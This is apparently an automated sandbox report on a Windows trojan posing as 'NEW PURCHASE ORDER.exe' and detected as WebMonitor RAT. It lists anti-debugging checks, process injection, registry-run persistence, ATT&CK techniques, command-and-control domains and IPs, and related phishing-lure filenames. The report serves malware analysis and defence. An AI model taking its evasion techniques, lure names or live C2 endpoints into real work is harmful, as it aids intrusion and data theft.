Source: NEW PURCHASE ORDER.exe, 00000002.00000003.220488913.000000000081B000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Guest Service Interfaceetup

Anti Debugging:

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Show sources

Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe

Code function: 2_2_00438DCE GetCurrentProcess,CheckRemoteDebuggerPresent,

2_2_00438DCE

Potentially malicious time measurement code found

Show sources

Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Code function: 2_2_00438418 Start: 0043843C End: 00438430		2_2_00438418
Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Code function: 2_1_00438418 Start: 0043843C End: 00438430		2_1_00438418

Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe

Code function: 2_2_00438418 rdtsc

2_2_00438418

Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe

Code function: 2_2_004A5CAD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

2_2_004A5CAD

Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe

Code function: 2_2_004382E8 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,

2_2_004382E8

Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe

Code function: 2_2_004B0BDB mov eax, dword ptr fs:[00000030h]

2_2_004B0BDB

Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe

Code function: 0_2_00404E0F SendMessageW,SendMessageW,SendMessageW,lstrlenW,lstrlenW,lstrlenW,GetProcessHeap,HeapAlloc,wsprintfW,MessageBoxW,GetProcessHeap,HeapFree,

0_2_00404E0F

Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Code function: 2_2_0049D2FC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_0049D2FC
Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Code function: 2_2_004A5CAD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_004A5CAD
Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Code function: 2_2_0049DD48 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_0049DD48
Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Code function: 2_1_0049D2FC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_1_0049D2FC

Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe

Memory protected: page execute and read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe

Section loaded: unknown target: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe protection: execute and read and write

Jump to behavior

Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe

Process created: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe 'C:\Users\user\Desktop\NEW PURCHASE ORDER.exe'

Jump to behavior

Source: NEW PURCHASE ORDER.exe, 00000002.00000002.484046833.0000000000E80000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: NEW PURCHASE ORDER.exe, 00000002.00000002.484046833.0000000000E80000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: NEW PURCHASE ORDER.exe, 00000002.00000002.484046833.0000000000E80000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: NEW PURCHASE ORDER.exe, 00000002.00000002.483730404.0000000000869000.00000004.00000020.sdmp	Binary or memory string: ft Windows 10 Professional (x64)\|70bc7c8d2b17fc20f3965e7d355ca380\|0\|Program Manager\|101\|2.00
Source: NEW PURCHASE ORDER.exe, 00000002.00000003.360112262.00000000008BB000.00000004.00000001.sdmp	Binary or memory string: Program Managerw
Source: NEW PURCHASE ORDER.exe, 00000002.00000002.483730404.0000000000869000.00000004.00000020.sdmp	Binary or memory string: niiarmah.wm01.toft Windows 10 Professional (x64)\|70bc7c8d2b17fc20f3965e7d355ca380\|0\|Program Manager\|101\|2.00
Source: NEW PURCHASE ORDER.exe, 00000002.00000002.484046833.0000000000E80000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe

Code function: 2_2_0043865F cpuid

2_2_0043865F

Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Code function: GetLocaleInfoEx,GetLocaleInfoEx,GetLocaleInfoW,	2_2_0049C76F
Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	2_2_004BE45D
Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Code function: EnumSystemLocalesW,	2_2_004B74D1
Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Code function: EnumSystemLocalesW,	2_2_004BE6D5
Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Code function: GetLocaleInfoEx,___wcsnicmp_ascii,	2_2_0049C6A4
Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Code function: EnumSystemLocalesW,	2_2_004BE720
Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Code function: EnumSystemLocalesW,	2_2_004BE7BB
Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	2_2_004BE848
Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Code function: GetLocaleInfoW,	2_2_004B79BA
Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Code function: GetLocaleInfoW,	2_2_004BEA98
Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	2_2_004BEBC1
Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Code function: GetLocaleInfoW,	2_2_004BECC8
Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	2_2_004BED95
Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Code function: GetLocaleInfoEx,GetLocaleInfoEx,GetLocaleInfoW,	2_1_0049C76F
Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	2_1_004BE45D
Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Code function: EnumSystemLocalesW,	2_1_004B74D1
Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Code function: EnumSystemLocalesW,	2_1_004BE6D5
Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Code function: GetLocaleInfoEx,___wcsnicmp_ascii,	2_1_0049C6A4
Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Code function: EnumSystemLocalesW,	2_1_004BE720
Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe	Code function: EnumSystemLocalesW,	2_1_004BE7BB

Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe

Code function: 0_2_0040388A GetDlgItem,SendMessageW,SendMessageW,SendMessageW,SendMessageW,EndDialog,GetDlgItem,GetLocalTime,GetDateFormatW,GetDateFormatW,SendMessageW,SendMessageW,GetDateFormatW,SendMessageW,GetTimeFormatW,SendMessageW,SendMessageW,

0_2_0040388A

Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe

Code function: 2_2_004BA019 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

2_2_004BA019

Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe

Code function: 2_2_0043F7AD GetVersion,

2_2_0043F7AD

Source: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected WebMonitor RAT

Show sources

Source: Yara match	File source: 2.1.NEW PURCHASE ORDER.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.NEW PURCHASE ORDER.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.1.NEW PURCHASE ORDER.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.NEW PURCHASE ORDER.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.NEW PURCHASE ORDER.exe.21d0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.NEW PURCHASE ORDER.exe.21d0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.223260400.00000000021D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: NEW PURCHASE ORDER.exe PID: 5772, type: MEMORYSTR

Remote Access Functionality:

Yara detected WebMonitor RAT

Show sources

Source: Yara match	File source: 2.1.NEW PURCHASE ORDER.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.NEW PURCHASE ORDER.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.1.NEW PURCHASE ORDER.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.NEW PURCHASE ORDER.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.NEW PURCHASE ORDER.exe.21d0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.NEW PURCHASE ORDER.exe.21d0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.223260400.00000000021D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: NEW PURCHASE ORDER.exe PID: 5772, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation2	Registry Run Keys / Startup Folder11	Access Token Manipulation1	Masquerading1	Input Capture21	System Time Discovery2	Remote Services	Input Capture21	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Command and Scripting Interpreter2	Boot or Logon Initialization Scripts	Process Injection112	Virtualization/Sandbox Evasion23	LSASS Memory	Query Registry1	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Non-Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Native API1	Logon Script (Windows)	Registry Run Keys / Startup Folder11	Disable or Modify Tools1	Security Account Manager	Security Software Discovery541	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Access Token Manipulation1	NTDS	Virtualization/Sandbox Evasion23	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Process Injection112	LSA Secrets	Process Discovery2	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Deobfuscate/Decode Files or Information1	Cached Domain Credentials	Application Window Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Obfuscated Files or Information2	DCSync	Remote System Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Software Packing1	Proc Filesystem	File and Directory Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	System Information Discovery225	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
NEW PURCHASE ORDER.exe	54%	Virustotal		Browse
NEW PURCHASE ORDER.exe	57%	ReversingLabs	Win32.Trojan.Tnega

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
0.2.NEW PURCHASE ORDER.exe.21d0000.2.unpack	100%	Avira	TR/Crypt.XPACK.Gen		Download File

Domains

Source	Detection	Scanner	Link
niiarmah.wm01.to	1%	Virustotal	Browse
api.globalsign.cloud	0%	Virustotal	Browse
ntp.se	0%	Virustotal	Browse
sdns.se	1%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
https://0/recv5.php	0%	Avira URL Cloud	safe
https://niiarmah.wm01.to/recv5.phpU	0%	Avira URL Cloud	safe
https://0/recv5.phpL	0%	Avira URL Cloud	safe
https://0/recv5.phpAao2	0%	Avira URL Cloud	safe
https://niiarmah.wm01.to/	0%	Avira URL Cloud	safe
https://niiarmah.wm01.to/recv5.phpC	0%	Avira URL Cloud	safe
https://niiarmah.wm01.to/recv5.php	0%	Avira URL Cloud	safe
https://niiarmah.wm01.to/recv5.phpLp	0%	Avira URL Cloud	safe
https://niiarmah.wm01.to/recv5.phpp	0%	Avira URL Cloud	safe
https://0.0.0.0/recv5.php	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
niiarmah.wm01.to	45.153.186.90	true	false	1%, Virustotal, Browse	unknown
api.globalsign.cloud	104.18.24.243	true	false	0%, Virustotal, Browse	unknown
ntp.se	194.58.200.20	true	false	0%, Virustotal, Browse	unknown
sdns.se	185.243.215.214	true	false	1%, Virustotal, Browse	unknown
fad3f505ccdd111848ff5bf3a7d712ae.se	unknown	unknown	true		unknown
ccee0140345c08734408cf05809907fc.se	unknown	unknown	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://0/recv5.php	NEW PURCHASE ORDER.exe, 00000002.00000002.483730404.0000000000869000.00000004.00000020.sdmp, NEW PURCHASE ORDER.exe, 00000002.00000002.483645449.0000000000856000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	low
https://niiarmah.wm01.to/recv5.phpU	NEW PURCHASE ORDER.exe, 00000002.00000002.483870501.0000000000899000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://0/recv5.phpL	NEW PURCHASE ORDER.exe, 00000002.00000002.483645449.0000000000856000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	low
https://0/recv5.phpAao2	NEW PURCHASE ORDER.exe, 00000002.00000002.483645449.0000000000856000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	low
https://niiarmah.wm01.to/	NEW PURCHASE ORDER.exe, 00000002.00000002.483730404.0000000000869000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://niiarmah.wm01.to/recv5.phpC	NEW PURCHASE ORDER.exe, 00000002.00000002.483135207.000000000080F000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://niiarmah.wm01.to/recv5.php	NEW PURCHASE ORDER.exe, 00000002.00000002.483730404.0000000000869000.00000004.00000020.sdmp, NEW PURCHASE ORDER.exe, 00000002.00000002.486996734.0000000003112000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://niiarmah.wm01.to/recv5.phpLp	NEW PURCHASE ORDER.exe, 00000002.00000002.483730404.0000000000869000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://niiarmah.wm01.to/recv5.phpp	NEW PURCHASE ORDER.exe, 00000002.00000002.483730404.0000000000869000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://0.0.0.0/recv5.php	NEW PURCHASE ORDER.exe, 00000002.00000002.483730404.0000000000869000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
194.58.200.20	ntp.se	Sweden		57021	NTP-SEAnycastedNTPservicesfromNetnodIXPsSE	false
45.153.186.90	niiarmah.wm01.to	Bulgaria		202448	MVPShttpswwwmvpsnetEU	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	463856
Start date:	12.08.2021
Start time:	07:44:44
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 3s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	NEW PURCHASE ORDER.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	26
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/3@31/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 5.7% (good quality ratio 5.2%) Quality average: 71.3% Quality standard deviation: 29.6%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 104.208.16.94, 23.211.6.115, 20.42.65.92, 52.168.117.173, 20.189.173.20, 20.42.73.29, 23.211.4.86, 20.82.210.154, 173.222.108.210, 173.222.108.226, 40.112.88.60, 80.67.82.235, 80.67.82.211, 205.185.216.42, 205.185.216.10 Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, au.download.windowsupdate.com.edgesuite.net, ocsp.msocsp.com, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, onedsblobprdeus15.eastus.cloudapp.azure.com, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, onedsblobprdcus16.centralus.cloudapp.azure.com, fs.microsoft.com, ris-prod.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, cds.d2s7q6s2.hwcdn.net, ris.api.iris.microsoft.com, onedsblobprdeus17.eastus.cloudapp.azure.com, hostedocsp.globalsign.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
07:45:46	API Interceptor	1x Sleep call for process: NEW PURCHASE ORDER.exe modified
07:46:51	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WebMonitor-70bc C:\Users\user\AppData\Roaming\WebMonitor-70bc.exe
07:46:59	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run WebMonitor-70bc C:\Users\user\AppData\Roaming\WebMonitor-70bc.exe
07:47:07	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run WebMonitor-70bc C:\Users\user\AppData\Roaming\WebMonitor-70bc.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
194.58.200.20	STATEMENT OF ACCOUNT.exe	Get hash	malicious	Browse
	Banking_cordinates_928273.exe	Get hash	malicious	Browse
	REQUEST FOR QUOTATION.exe	Get hash	malicious	Browse
	allcrhfJER.exe	Get hash	malicious	Browse
	HSBC_PAYMENT_COPY.pdf.exe	Get hash	malicious	Browse
	FILE_2932NH_9923.exe	Get hash	malicious	Browse
	DHL_PACKAGE_HD98232.pdf.exe	Get hash	malicious	Browse
	BANK DETAILS.pdf.exe	Get hash	malicious	Browse
	OFfcxY5xia.exe	Get hash	malicious	Browse
	Z2YNNlDA9o.exe	Get hash	malicious	Browse
	MATCH_OUTSTANDING_BILL.exe	Get hash	malicious	Browse
	lc3of5dOat.exe	Get hash	malicious	Browse
	IMAGE20210406_490133692.exe.exe	Get hash	malicious	Browse
	JANUARY OVERDUE INVOICE.pdf.exe	Get hash	malicious	Browse
	IMA_2021-03-10.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.GenericKDZ.73162.30196.exe	Get hash	malicious	Browse
	Code.exe	Get hash	malicious	Browse
	IRS RELIEF PDF.exe	Get hash	malicious	Browse
	tax-relief.exe	Get hash	malicious	Browse
	1Rv2jMLk7F.exe	Get hash	malicious	Browse
45.153.186.90	STATEMENT OF ACCOUNT.exe	Get hash	malicious	Browse
	Banking_cordinates_928273.exe	Get hash	malicious	Browse
	REQUEST FOR QUOTATION.exe	Get hash	malicious	Browse
	FILE_2932NH_9923.exe	Get hash	malicious	Browse
	DHL_PACKAGE_HD98232.pdf.exe	Get hash	malicious	Browse
	BANK DETAILS.pdf.exe	Get hash	malicious	Browse
	OFfcxY5xia.exe	Get hash	malicious	Browse
	Z2YNNlDA9o.exe	Get hash	malicious	Browse
	MATCH_OUTSTANDING_BILL.exe	Get hash	malicious	Browse
	lc3of5dOat.exe	Get hash	malicious	Browse
	IMAGE20210406_490133692.exe.exe	Get hash	malicious	Browse
	JANUARY OVERDUE INVOICE.pdf.exe	Get hash	malicious	Browse
	IMA_2021-03-10.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.GenericKDZ.73162.30196.exe	Get hash	malicious	Browse
	Code.exe	Get hash	malicious	Browse
	IRS RELIEF PDF.exe	Get hash	malicious	Browse
	tax-relief.exe	Get hash	malicious	Browse
	1Rv2jMLk7F.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ntp.se	STATEMENT OF ACCOUNT.exe	Get hash	malicious	Browse	194.58.200.20
	Banking_cordinates_928273.exe	Get hash	malicious	Browse	194.58.200.20
	REQUEST FOR QUOTATION.exe	Get hash	malicious	Browse	194.58.200.20
	allcrhfJER.exe	Get hash	malicious	Browse	194.58.200.20
	HSBC_PAYMENT_COPY.pdf.exe	Get hash	malicious	Browse	194.58.200.20
	FILE_2932NH_9923.exe	Get hash	malicious	Browse	194.58.200.20
	DHL_PACKAGE_HD98232.pdf.exe	Get hash	malicious	Browse	194.58.200.20
	BANK DETAILS.pdf.exe	Get hash	malicious	Browse	194.58.200.20
	OFfcxY5xia.exe	Get hash	malicious	Browse	194.58.200.20
	Z2YNNlDA9o.exe	Get hash	malicious	Browse	194.58.200.20
	MATCH_OUTSTANDING_BILL.exe	Get hash	malicious	Browse	194.58.200.20
	lc3of5dOat.exe	Get hash	malicious	Browse	194.58.200.20
	IMAGE20210406_490133692.exe.exe	Get hash	malicious	Browse	194.58.200.20
	JANUARY OVERDUE INVOICE.pdf.exe	Get hash	malicious	Browse	194.58.200.20
	IMA_2021-03-10.exe	Get hash	malicious	Browse	194.58.200.20
	SecuriteInfo.com.Trojan.GenericKDZ.73162.30196.exe	Get hash	malicious	Browse	194.58.200.20
	Code.exe	Get hash	malicious	Browse	194.58.200.20
	IRS RELIEF PDF.exe	Get hash	malicious	Browse	194.58.200.20
	tax-relief.exe	Get hash	malicious	Browse	194.58.200.20
	1Rv2jMLk7F.exe	Get hash	malicious	Browse	194.58.200.20
niiarmah.wm01.to	STATEMENT OF ACCOUNT.exe	Get hash	malicious	Browse	45.153.186.90
	Banking_cordinates_928273.exe	Get hash	malicious	Browse	45.153.186.90
	REQUEST FOR QUOTATION.exe	Get hash	malicious	Browse	45.153.186.90
	FILE_2932NH_9923.exe	Get hash	malicious	Browse	45.153.186.90
	DHL_PACKAGE_HD98232.pdf.exe	Get hash	malicious	Browse	45.153.186.90
	BANK DETAILS.pdf.exe	Get hash	malicious	Browse	45.153.186.90
	MATCH_OUTSTANDING_BILL.exe	Get hash	malicious	Browse	45.153.186.90
	JANUARY OVERDUE INVOICE.pdf.exe	Get hash	malicious	Browse	45.153.186.90
api.globalsign.cloud	PDF.VIV0.WXJKDZKLQRFZEDVIQMGZ_.msi	Get hash	malicious	Browse	104.18.24.243
	setup.exe	Get hash	malicious	Browse	104.18.24.243
	Sum90384.htm	Get hash	malicious	Browse	104.18.25.243
	ZIt8cqt180gNP.dll	Get hash	malicious	Browse	104.18.24.243
	RyqXLe.dll	Get hash	malicious	Browse	104.18.24.243
	orderDetails.xlsx	Get hash	malicious	Browse	104.18.25.243
	EUROSYS RFQ#09082021,pdf.exe	Get hash	malicious	Browse	104.18.25.243
	MGJEJyPHF4.exe	Get hash	malicious	Browse	104.18.24.243
	Lb82b7Croa.exe	Get hash	malicious	Browse	104.18.25.243
	Invoicel-datasheet.exe	Get hash	malicious	Browse	104.18.24.243
	SecuriteInfo.com.Trojan.Win32.Save.a.28121.exe	Get hash	malicious	Browse	104.18.25.243
	IMAGE04082021.jar	Get hash	malicious	Browse	104.18.25.243
	Quotation.exe	Get hash	malicious	Browse	104.18.24.243
	SecuriteInfo.com.Backdoor.Fynloski.A3.28342.exe	Get hash	malicious	Browse	104.18.24.243
	DOC-MC765.vbs	Get hash	malicious	Browse	104.18.25.243
	fEx6zVimHy.exe	Get hash	malicious	Browse	104.18.24.243
	Selenium Updater 1.00.xlsm	Get hash	malicious	Browse	104.18.25.243
	bestie.exe	Get hash	malicious	Browse	104.18.24.243
	9uYILAZnzS.docx	Get hash	malicious	Browse	104.18.24.243
	Transfer Payment For Invoice 321-1005703.exe	Get hash	malicious	Browse	104.18.25.243

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
NTP-SEAnycastedNTPservicesfromNetnodIXPsSE	STATEMENT OF ACCOUNT.exe	Get hash	malicious	Browse	194.58.200.20
	Banking_cordinates_928273.exe	Get hash	malicious	Browse	194.58.200.20
	REQUEST FOR QUOTATION.exe	Get hash	malicious	Browse	194.58.200.20
	allcrhfJER.exe	Get hash	malicious	Browse	194.58.200.20
	HSBC_PAYMENT_COPY.pdf.exe	Get hash	malicious	Browse	194.58.200.20
	FILE_2932NH_9923.exe	Get hash	malicious	Browse	194.58.200.20
	DHL_PACKAGE_HD98232.pdf.exe	Get hash	malicious	Browse	194.58.200.20
	BANK DETAILS.pdf.exe	Get hash	malicious	Browse	194.58.200.20
	OFfcxY5xia.exe	Get hash	malicious	Browse	194.58.200.20
	Z2YNNlDA9o.exe	Get hash	malicious	Browse	194.58.200.20
	MATCH_OUTSTANDING_BILL.exe	Get hash	malicious	Browse	194.58.200.20
	lc3of5dOat.exe	Get hash	malicious	Browse	194.58.200.20
	IMAGE20210406_490133692.exe.exe	Get hash	malicious	Browse	194.58.200.20
	JANUARY OVERDUE INVOICE.pdf.exe	Get hash	malicious	Browse	194.58.200.20
	IMA_2021-03-10.exe	Get hash	malicious	Browse	194.58.200.20
	SecuriteInfo.com.Trojan.GenericKDZ.73162.30196.exe	Get hash	malicious	Browse	194.58.200.20
	Code.exe	Get hash	malicious	Browse	194.58.200.20
	IRS RELIEF PDF.exe	Get hash	malicious	Browse	194.58.200.20
	tax-relief.exe	Get hash	malicious	Browse	194.58.200.20
	1Rv2jMLk7F.exe	Get hash	malicious	Browse	194.58.200.20
MVPShttpswwwmvpsnetEU	STATEMENT OF ACCOUNT.exe	Get hash	malicious	Browse	45.153.186.90
	Banking_cordinates_928273.exe	Get hash	malicious	Browse	45.153.186.90
